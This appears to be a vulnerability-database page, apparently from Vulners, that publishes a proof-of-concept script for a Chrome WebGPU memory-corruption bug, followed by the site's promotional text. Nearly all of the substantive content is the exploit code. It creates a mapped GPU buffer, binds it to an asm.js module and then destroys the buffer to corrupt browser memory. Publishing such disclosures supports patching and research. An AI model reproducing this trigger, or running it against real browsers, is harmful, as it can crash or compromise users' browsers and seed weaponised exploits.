`<script>
/*
Google Chrome WebGPU Memory Corruption
Author: Jean Pereira <[email protected]>
Released: 2023/06/25
Vendor: https://www.google.com
Software: https://www.google.com/chrome/
Tested with version: 115.0.5790.102 (latest version)
*/
navigator.gpu.requestAdapter().then(a => {
a.requestDevice().then(d => {
const b = d.createBuffer({
mappedAtCreation: true,
size: 0x1000,
usage: GPUBufferUsage.MAP_WRITE,
})
function asm(s, a, b) {
'use asm'
var arr = new s.Uint32Array(b)
function nop(x) {
x = x | 0
}
return nop
}
asm({
Uint32Array: Uint32Array
}, {}, b.getMappedRange())
b.destroy()
})
})
</script>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation